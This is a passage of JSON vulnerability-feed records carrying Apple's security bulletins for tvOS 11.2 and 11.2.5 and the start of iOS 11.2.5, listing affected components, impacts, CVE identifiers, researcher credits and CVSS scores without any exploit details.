University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: Multiple validation issues were addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**Wi-Fi**\n\nAvailable for: Apple TV (4th generation) \nReleased for Apple TV 4K in [tvOS 11.1](<https://support.apple.com/kb/HT208219>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-18T05:56:48", "title": "About the security content of tvOS 11.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13869", "CVE-2017-5754", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7151", "CVE-2017-13080", "CVE-2017-13865", "CVE-2017-7172", "CVE-2017-7165", "CVE-2017-13904", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-13870", "CVE-2017-13868", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-13867", "CVE-2017-7173", "CVE-2017-13861", "CVE-2017-7154", "CVE-2017-7157", "CVE-2017-13905", "CVE-2017-13885", "CVE-2017-13862", "CVE-2017-7164"], "modified": "2018-10-18T05:56:48", "id": "APPLE:HT208327", "href": "https://support.apple.com/kb/HT208327", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:39", "description": "# About the security content of tvOS 11.2\n\nThis document describes the security content of tvOS 11.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 11.2\n\nReleased December 4, 2017\n\n**App Store**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in App Store\n\nDescription: An input validation issue was addressed through improved input validation.\n\nCVE-2017-7164: Jerry Decime\n\nEntry added January 11, 2018\n\n**Auto Unlock**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOSurface**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: Multiple validation issues were addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**Wi-Fi**\n\nAvailable for: Apple TV (4th generation) \nReleased for Apple TV 4K in [tvOS 11.1](<https://support.apple.com/kb/HT208219>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 18, 2018\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-04T00:00:00", "type": "apple", "title": "About the security content of tvOS 11.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13080", "CVE-2017-13855", "CVE-2017-13856", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13866", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13870", "CVE-2017-13876", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7153", "CVE-2017-7154", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7162", "CVE-2017-7164", "CVE-2017-7165", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173"], "modified": "2017-12-04T00:00:00", "id": "APPLE:F6306C158D7B30BA0A0EDD411C414BFE", "href": "https://support.apple.com/kb/HT208327", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:41", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 11.2.5\n\nReleased January 23, 2018\n\n**Audio**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4094: Mingi Cho, Seoyoung Kim, Young-Ho Lee, MinSik Shin and Taekyoung Kwon of the Information Security Lab, Yonsei University\n\nEntry updated November 16, 2018\n\n**Core Bluetooth**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4087: Rani Idan (@raniXCH) of Zimperium zLabs Team\n\nCVE-2018-4095: Rani Idan (@raniXCH) of Zimperium zLabs Team\n\n**Graphics Driver**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4109: Adam Donenfeld (@doadam) of the Zimperium zLabs Team\n\nEntry added February 8, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2018-4090: Jann Horn of Google Project Zero\n\nEntry updated November 16, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4092: Stefan Esser of Antid0te UG\n\nEntry updated November 16, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4082: Russ Cox of Google\n\nEntry updated November 16, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2018-4093: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4189: an anonymous researcher\n\nEntry added May 2, 2018\n\n**QuartzCore**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the processing of web content. This issue was addressed with improved input validation.\n\nCVE-2018-4085: Ret2 Systems Inc. working with Trend Micro's Zero Day Initiative\n\nEntry updated November 16, 2018\n\n**Security**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A certificate may have name constraints applied incorrectly\n\nDescription: A certificate evaluation issue existed in the handling of name constraints. This issue was addressed with improved trust evaluation of certificates.\n\nCVE-2018-4086: Ian Haken of Netflix\n\nEntry updated November 16, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4088: Jeonghoon Shin of Theori\n\nCVE-2018-4089: Ivan Fratric of Google Project Zero\n\nCVE-2018-4096: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4147: found by OSS-Fuzz\n\nEntry added October 18, 2018\n\n**WebKit Page Loading**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7830: Jun Kokatsu (@shhnjk)\n\nEntry added October 18, 2018\n", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-17T12:38:01", "title": "About the security content of tvOS 11.2.5 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4092", "CVE-2018-4082", "CVE-2018-4147", "CVE-2018-4087", "CVE-2018-4093", "CVE-2018-4095", "CVE-2018-4086", "CVE-2018-4088", "CVE-2018-4094", "CVE-2018-4096", "CVE-2018-4109", "CVE-2018-4089", "CVE-2018-4090", "CVE-2017-7830", "CVE-2018-4085", "CVE-2018-4189"], "modified": "2018-11-17T12:38:01", "id": "APPLE:HT208462", "href": "https://support.apple.com/kb/HT208462", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:32", "description": "# About the security content of tvOS 11.2.5\n\nThis document describes the security content of tvOS 11.2.5.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 11.2.5\n\nReleased January 23, 2018\n\n**Audio**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4094: Mingi Cho, Seoyoung Kim, Young-Ho Lee, MinSik Shin and Taekyoung Kwon of the Information Security Lab, Yonsei University\n\nEntry updated November 16, 2018\n\n**Core Bluetooth**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4087: Rani Idan (@raniXCH) of Zimperium zLabs Team\n\nCVE-2018-4095: Rani Idan (@raniXCH) of Zimperium zLabs Team\n\n**Graphics Driver**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4109: Adam Donenfeld (@doadam) of the Zimperium zLabs Team\n\nEntry added February 8, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2018-4090: Jann Horn of Google Project Zero\n\nEntry updated November 16, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4092: Stefan Esser of Antid0te UG\n\nEntry updated November 16, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4082: Russ Cox of Google\n\nEntry updated November 16, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2018-4093: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4189: an anonymous researcher\n\nEntry added May 2, 2018\n\n**QuartzCore**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the processing of web content. This issue was addressed with improved input validation.\n\nCVE-2018-4085: Ret2 Systems Inc. working with Trend Micro's Zero Day Initiative\n\nEntry updated November 16, 2018\n\n**Security**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A certificate may have name constraints applied incorrectly\n\nDescription: A certificate evaluation issue existed in the handling of name constraints. This issue was addressed with improved trust evaluation of certificates.\n\nCVE-2018-4086: Ian Haken of Netflix\n\nEntry updated November 16, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4088: Jeonghoon Shin of Theori\n\nCVE-2018-4089: Ivan Fratric of Google Project Zero\n\nCVE-2018-4096: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4147: found by OSS-Fuzz\n\nEntry added October 18, 2018\n\n**WebKit Page Loading**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7830: Jun Kokatsu (@shhnjk)\n\nEntry added October 18, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 17, 2018\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-23T00:00:00", "type": "apple", "title": "About the security content of tvOS 11.2.5", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7830", "CVE-2018-4082", "CVE-2018-4085", "CVE-2018-4086", "CVE-2018-4087", "CVE-2018-4088", "CVE-2018-4089", "CVE-2018-4090", "CVE-2018-4092", "CVE-2018-4093", "CVE-2018-4094", "CVE-2018-4095", "CVE-2018-4096", "CVE-2018-4109", "CVE-2018-4147", "CVE-2018-4189"], "modified": "2018-01-23T00:00:00", "id": "APPLE:FA44BC8558B06F29865CFB0FEB7A7214", "href": "https://support.apple.com/kb/HT208462", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:32", "description": "# About the security content of iOS 11.2.5\n\nThis document describes the security content of iOS 11.2.5.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 11.2.5\n\nReleased January 23, 2018\n\n**Audio**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4094: Mingi Cho, Seoyoung Kim, Young-Ho 